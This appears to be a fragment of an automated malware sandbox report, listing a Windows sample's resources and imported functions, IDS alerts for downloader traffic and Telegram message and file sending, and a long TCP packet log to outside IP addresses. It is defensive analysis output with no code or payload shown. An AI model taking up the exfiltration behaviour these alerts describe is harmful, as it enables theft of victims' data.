                                                                                                                      RT_ICON0xd4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                                                                      RT_ICON0xd5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                                                                      RT_ICON0xd64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                                                                      RT_ICON0xd69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                                                                      RT_ICON0xd8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                                                                      RT_ICON0xda0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                                                                      RT_MENU0xda4a00x50dataEnglishGreat Britain0.9
                                                                                                                      RT_STRING0xda4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                                                                      RT_STRING0xdaa840x68adataEnglishGreat Britain0.2735961768219833
                                                                                                                      RT_STRING0xdb1100x490dataEnglishGreat Britain0.3715753424657534
                                                                                                                      RT_STRING0xdb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                                      RT_STRING0xdbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                                      RT_STRING0xdc1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                                                                      RT_STRING0xdc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                                                      RT_RCDATA0xdc7b80x2e999data1.0003457796545348
                                                                                                                      RT_GROUP_ICON0x10b1540x76dataEnglishGreat Britain0.6610169491525424
                                                                                                                      RT_GROUP_ICON0x10b1cc0x14dataEnglishGreat Britain1.25
                                                                                                                      RT_GROUP_ICON0x10b1e00x14dataEnglishGreat Britain1.15
                                                                                                                      RT_GROUP_ICON0x10b1f40x14dataEnglishGreat Britain1.25
                                                                                                                      RT_VERSION0x10b2080xdcdataEnglishGreat Britain0.6181818181818182
                                                                                                                      RT_MANIFEST0x10b2e40x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                                                                                      Imports

                                                                                                                      DLLImport
                                                                                                                      WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                                                                                                                      VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                                                                      WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                                      COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                                                                      MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                                                                                                                      WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                                                                                                                      PSAPI.DLLGetProcessMemoryInfo
                                                                                                                      IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                                                                                                                      USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                                                                                                                      UxTheme.dllIsThemeActive
                                                                                                                      KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
                                                                                                                      USER32.dllGetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
                                                                                                                      GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                                                                                                                      COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                                      ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                                                                                                                      SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                                                                                                                      ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                                                                      OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

                                                                                                                      Possible Origin

                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                      EnglishGreat Britain

                                                                                                                      Network Behavior

                                                                                                                      Suricata IDS Alerts

                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                      2025-01-02T13:45:07.967448+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549704193.122.130.080TCP
                                                                                                                      2025-01-02T13:45:09.561231+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549704193.122.130.080TCP
                                                                                                                      2025-01-02T13:45:10.132397+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549706188.114.97.3443TCP
                                                                                                                      2025-01-02T13:45:21.795605+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549707193.122.130.080TCP
                                                                                                                      2025-01-02T13:45:38.151146+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549818188.114.97.3443TCP
                                                                                                                      2025-01-02T13:45:39.381953+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549825188.114.97.3443TCP
                                                                                                                      2025-01-02T13:45:42.319795+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549841188.114.97.3443TCP
                                                                                                                      2025-01-02T13:45:46.844932+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.549868149.154.167.220443TCP
                                                                                                                      2025-01-02T13:45:47.901899+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.549879149.154.167.220443TCP

                                                                                                                      Network Port Distribution

                                                                                                                      TCP Packets

                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Jan 2, 2025 13:45:04.117489100 CET4970480192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:04.122412920 CET8049704193.122.130.0192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:04.122484922 CET4970480192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:04.122697115 CET4970480192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:04.127657890 CET8049704193.122.130.0192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:07.592010975 CET8049704193.122.130.0192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:07.596676111 CET4970480192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:07.601470947 CET8049704193.122.130.0192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:07.923041105 CET8049704193.122.130.0192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:07.967255116 CET49705443192.168.2.5188.114.97.3
                                                                                                                      Jan 2, 2025 13:45:07.967284918 CET44349705188.114.97.3192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:07.967353106 CET49705443192.168.2.5188.114.97.3
                                                                                                                      Jan 2, 2025 13:45:07.967447996 CET4970480192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:07.973558903 CET49705443192.168.2.5188.114.97.3
                                                                                                                      Jan 2, 2025 13:45:07.973571062 CET44349705188.114.97.3192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:08.444377899 CET44349705188.114.97.3192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:08.444457054 CET49705443192.168.2.5188.114.97.3
                                                                                                                      Jan 2, 2025 13:45:08.460140944 CET49705443192.168.2.5188.114.97.3
                                                                                                                      Jan 2, 2025 13:45:08.460151911 CET44349705188.114.97.3192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:08.460432053 CET44349705188.114.97.3192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:08.514333963 CET49705443192.168.2.5188.114.97.3
                                                                                                                      Jan 2, 2025 13:45:08.576558113 CET49705443192.168.2.5188.114.97.3
                                                                                                                      Jan 2, 2025 13:45:08.619329929 CET44349705188.114.97.3192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:08.684017897 CET44349705188.114.97.3192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:08.684063911 CET44349705188.114.97.3192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:08.684120893 CET49705443192.168.2.5188.114.97.3
                                                                                                                      Jan 2, 2025 13:45:08.701581001 CET49705443192.168.2.5188.114.97.3
                                                                                                                      Jan 2, 2025 13:45:08.708275080 CET4970480192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:08.713073969 CET8049704193.122.130.0192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:09.511228085 CET8049704193.122.130.0192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:09.513684034 CET49706443192.168.2.5188.114.97.3
                                                                                                                      Jan 2, 2025 13:45:09.513756037 CET44349706188.114.97.3192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:09.513829947 CET49706443192.168.2.5188.114.97.3
                                                                                                                      Jan 2, 2025 13:45:09.514230013 CET49706443192.168.2.5188.114.97.3
                                                                                                                      Jan 2, 2025 13:45:09.514252901 CET44349706188.114.97.3192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:09.561230898 CET4970480192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:09.987256050 CET44349706188.114.97.3192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:09.989428997 CET49706443192.168.2.5188.114.97.3
                                                                                                                      Jan 2, 2025 13:45:09.989470005 CET44349706188.114.97.3192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:10.132407904 CET44349706188.114.97.3192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:10.132464886 CET44349706188.114.97.3192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:10.132529020 CET49706443192.168.2.5188.114.97.3
                                                                                                                      Jan 2, 2025 13:45:10.134802103 CET49706443192.168.2.5188.114.97.3
                                                                                                                      Jan 2, 2025 13:45:10.137701035 CET4970480192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:10.138711929 CET4970780192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:10.142894030 CET8049704193.122.130.0192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:10.142970085 CET4970480192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:10.143524885 CET8049707193.122.130.0192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:10.143596888 CET4970780192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:10.143711090 CET4970780192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:10.148499966 CET8049707193.122.130.0192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:21.753254890 CET8049707193.122.130.0192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:21.754682064 CET49719443192.168.2.5188.114.97.3
                                                                                                                      Jan 2, 2025 13:45:21.754712105 CET44349719188.114.97.3192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:21.754825115 CET49719443192.168.2.5188.114.97.3
                                                                                                                      Jan 2, 2025 13:45:21.755096912 CET49719443192.168.2.5188.114.97.3
                                                                                                                      Jan 2, 2025 13:45:21.755106926 CET44349719188.114.97.3192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:21.795604944 CET4970780192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:22.251355886 CET44349719188.114.97.3192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:22.261846066 CET49719443192.168.2.5188.114.97.3
                                                                                                                      Jan 2, 2025 13:45:22.261863947 CET44349719188.114.97.3192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:22.405020952 CET44349719188.114.97.3192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:22.405081034 CET44349719188.114.97.3192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:22.405145884 CET49719443192.168.2.5188.114.97.3
                                                                                                                      Jan 2, 2025 13:45:22.405754089 CET49719443192.168.2.5188.114.97.3
                                                                                                                      Jan 2, 2025 13:45:22.410391092 CET4972580192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:22.415332079 CET8049725193.122.130.0192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:22.415537119 CET4972580192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:22.415671110 CET4972580192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:22.420530081 CET8049725193.122.130.0192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:31.166615009 CET8049725193.122.130.0192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:31.181651115 CET4977280192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:31.187495947 CET8049772193.122.130.0192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:31.187570095 CET4977280192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:31.187661886 CET4977280192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:31.193216085 CET8049772193.122.130.0192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:31.217508078 CET4972580192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:36.264492989 CET8049772193.122.130.0192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:36.271738052 CET49807443192.168.2.5188.114.97.3
                                                                                                                      Jan 2, 2025 13:45:36.271759987 CET44349807188.114.97.3192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:36.271859884 CET49807443192.168.2.5188.114.97.3
                                                                                                                      Jan 2, 2025 13:45:36.272068024 CET49807443192.168.2.5188.114.97.3
                                                                                                                      Jan 2, 2025 13:45:36.272080898 CET44349807188.114.97.3192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:36.272119999 CET4972580192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:36.277190924 CET8049725193.122.130.0192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:36.277261972 CET4972580192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:36.311258078 CET4977280192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:36.726675987 CET44349807188.114.97.3192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:36.734471083 CET49807443192.168.2.5188.114.97.3
                                                                                                                      Jan 2, 2025 13:45:36.734483004 CET44349807188.114.97.3192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:36.888787985 CET44349807188.114.97.3192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:36.888838053 CET44349807188.114.97.3192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:36.888920069 CET49807443192.168.2.5188.114.97.3
                                                                                                                      Jan 2, 2025 13:45:36.889370918 CET49807443192.168.2.5188.114.97.3
                                                                                                                      Jan 2, 2025 13:45:36.892745018 CET4977280192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:36.893845081 CET4981280192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:36.899100065 CET8049772193.122.130.0192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:36.899179935 CET4977280192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:36.900038958 CET8049812193.122.130.0192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:36.900104046 CET4981280192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:36.900193930 CET4981280192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:36.904968977 CET8049812193.122.130.0192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:37.530512094 CET8049812193.122.130.0192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:37.531960011 CET49818443192.168.2.5188.114.97.3
                                                                                                                      Jan 2, 2025 13:45:37.532028913 CET44349818188.114.97.3192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:37.532145977 CET49818443192.168.2.5188.114.97.3
                                                                                                                      Jan 2, 2025 13:45:37.532547951 CET49818443192.168.2.5188.114.97.3
                                                                                                                      Jan 2, 2025 13:45:37.532583952 CET44349818188.114.97.3192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:37.576886892 CET4981280192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:38.014117002 CET44349818188.114.97.3192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:38.015968084 CET49818443192.168.2.5188.114.97.3
                                                                                                                      Jan 2, 2025 13:45:38.016016960 CET44349818188.114.97.3192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:38.151170015 CET44349818188.114.97.3192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:38.151216030 CET44349818188.114.97.3192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:38.151429892 CET49818443192.168.2.5188.114.97.3
                                                                                                                      Jan 2, 2025 13:45:38.151626110 CET49818443192.168.2.5188.114.97.3
                                                                                                                      Jan 2, 2025 13:45:38.154726028 CET4981280192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:38.155915976 CET4982180192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:38.159684896 CET8049812193.122.130.0192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:38.159758091 CET4981280192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:38.160690069 CET8049821193.122.130.0192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:38.160751104 CET4982180192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:38.160829067 CET4982180192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:38.165663004 CET8049821193.122.130.0192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:38.732606888 CET8049821193.122.130.0192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:38.780045033 CET4982180192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:38.788127899 CET49825443192.168.2.5188.114.97.3
                                                                                                                      Jan 2, 2025 13:45:38.788162947 CET44349825188.114.97.3192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:38.788275003 CET49825443192.168.2.5188.114.97.3
                                                                                                                      Jan 2, 2025 13:45:38.788583994 CET49825443192.168.2.5188.114.97.3
                                                                                                                      Jan 2, 2025 13:45:38.788597107 CET44349825188.114.97.3192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:39.245563030 CET44349825188.114.97.3192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:39.247545958 CET49825443192.168.2.5188.114.97.3
                                                                                                                      Jan 2, 2025 13:45:39.247562885 CET44349825188.114.97.3192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:39.381985903 CET44349825188.114.97.3192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:39.382044077 CET44349825188.114.97.3192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:39.382184982 CET49825443192.168.2.5188.114.97.3
                                                                                                                      Jan 2, 2025 13:45:39.382620096 CET49825443192.168.2.5188.114.97.3
                                                                                                                      Jan 2, 2025 13:45:39.386483908 CET4982180192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:39.387644053 CET4982980192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:39.392479897 CET8049829193.122.130.0192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:39.392559052 CET4982980192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:39.392632008 CET4982980192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:39.397330046 CET8049829193.122.130.0192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:39.404692888 CET8049821193.122.130.0192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:39.404756069 CET4982180192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:41.702373981 CET8049829193.122.130.0192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:41.713386059 CET49841443192.168.2.5188.114.97.3
                                                                                                                      Jan 2, 2025 13:45:41.713432074 CET44349841188.114.97.3192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:41.713511944 CET49841443192.168.2.5188.114.97.3
                                                                                                                      Jan 2, 2025 13:45:41.717314005 CET49841443192.168.2.5188.114.97.3
                                                                                                                      Jan 2, 2025 13:45:41.717343092 CET44349841188.114.97.3192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:41.748790026 CET4982980192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:42.192437887 CET44349841188.114.97.3192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:42.193913937 CET49841443192.168.2.5188.114.97.3
                                                                                                                      Jan 2, 2025 13:45:42.193964005 CET44349841188.114.97.3192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:42.319806099 CET44349841188.114.97.3192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:42.319844961 CET44349841188.114.97.3192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:42.320143938 CET49841443192.168.2.5188.114.97.3
                                                                                                                      Jan 2, 2025 13:45:42.320471048 CET49841443192.168.2.5188.114.97.3
                                                                                                                      Jan 2, 2025 13:45:42.323318958 CET4982980192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:42.324460030 CET4984780192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:42.328378916 CET8049829193.122.130.0192.168.2.5
